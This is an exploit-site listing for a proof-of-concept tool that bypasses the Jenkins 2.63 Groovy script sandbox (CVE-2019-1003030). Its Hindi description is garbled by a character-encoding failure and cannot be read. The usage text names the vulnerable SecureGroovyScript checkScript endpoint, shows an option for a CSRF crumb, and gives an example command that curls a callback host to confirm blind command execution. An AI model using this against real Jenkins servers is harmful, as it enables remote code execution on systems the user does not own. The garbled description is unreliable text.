Sploitus

Exploit for PoC

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN34 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CYBERBELLY-POC-CVE-2019-1003030
## рдЬреЗрдиреНрдХрд┐рдиреНрд╕ 2.63 рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╕реБрд░рдХреНрд╖рд╛ рд╕реИрдВрдбрдмреЙрдХреНрд╕ рдмрд╛рдпрдкрд╛рд╕ PoC

рдпрд╣ рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдЬреЗрдиреНрдХрд┐рдиреНрд╕ 2.63 рджреНрд╡рд╛рд░рд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЬрд╛рдиреЗ рд╡рд╛рд▓реЗ Jenkins SecureGroovyScript рд╕рддреНрдпрд╛рдкрди рдПрдВрдбрдкреЙрдЗрдВрдЯ рдкрд░ Groovy рдкреЗрд▓реЛрдб рдмрдирд╛рдиреЗ рдФрд░ рд╡рд┐рддрд░рд┐рдд рдХрд░рдиреЗ рдХреЛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдХрд░рддрд╛ рд╣реИред рдЙрдкрдХрд░рдг рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рдФрд░ рдПрдХ-рд╢реЙрдЯ рдирд┐рд╖реНрдкрд╛рджрди рджреЛрдиреЛрдВ рдХрд╛ рд╕рдорд░реНрдерди рдХрд░рддрд╛ рд╣реИред рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдХреЛрдИ рдЖрдЙрдЯрдкреБрдЯ рдирд╣реАрдВ рд▓реМрдЯрд╛рддрд╛, рдЗрд╕рд▓рд┐рдП рдЖрдкрдХреЛ рдХреБрдЫ рд╕рддреНрдпрд╛рдкрди рдХрд░рдиреЗ рд╣реЛрдВрдЧреЗ рдЬреИрд╕реЗ рдЕрдкрдиреЗ AP рдкрд░ curl рдХрд░рдирд╛ рддрд╛рдХрд┐ рдпрд╣ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рд╣реЛ рд╕рдХреЗ рдХрд┐ рдпрд╣ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИред

рдЙрдкрдХрд░рдг рджреЛрдиреЛрдВ рдХрд╛ рд╕рдорд░реНрдерди рдХрд░рддрд╛ рд╣реИ:

  * рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рдХрдорд╛рдВрдб рдореЛрдб
  * рдПрдХрд▓ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди
  * GET рдФрд░ POST рдЕрдиреБрд░реЛрдз
  * рд╡реИрдХрд▓реНрдкрд┐рдХ Jenkins CSRF crumb рд╕рдорд░реНрдерди



> **рдЕрд╕реНрд╡реАрдХрд░рдг**
> 
> рдпрд╣ рдкреНрд░реЛрдЬреЗрдХреНрдЯ **рдХреЗрд╡рд▓ рд╕реБрд░рдХреНрд╖рд╛ рдЕрдиреБрд╕рдВрдзрд╛рди, CTFs, рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡рд╛рддрд╛рд╡рд░рдг рдФрд░ рдЕрдзрд┐рдХреГрдд рдкреЗрдирд┐рдЯреНрд░реЗрд╢рди рдЯреЗрд╕реНрдЯрд┐рдВрдЧ** рдХреЗ рд▓рд┐рдП рд╣реИред рдЗрд╕реЗ рд╕реНрдкрд╖реНрдЯ рдЕрдиреБрдорддрд┐ рдХреЗ рдмрд┐рдирд╛ рд╕рд┐рд╕реНрдЯрдо рдХреЗ рд╡рд┐рд░реБрджреНрдз **рдЙрдкрдпреЛрдЧ рди рдХрд░реЗрдВ** ред

root@kitploit:~
    
    
    usage: Poc.py -u http://10.10.10.10:8080/  [-c 'curl http://10.10.10.9/callback'] [-X POST] [-p /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript]
    
    PoC for sandbox bypass for jenkins 2.63
    
    options:
      -h, --help            show this help message and exit
      -u, --url URL         ip of target
      -X, --method METHOD   post or get
      -b, --breadcrum BREADCRUM
                            optional jenkins crumb string
      -c, --command COMMAND
                            command to run on jenkins, not output expected
      -p, --path PATH       path to the script, you might prepend more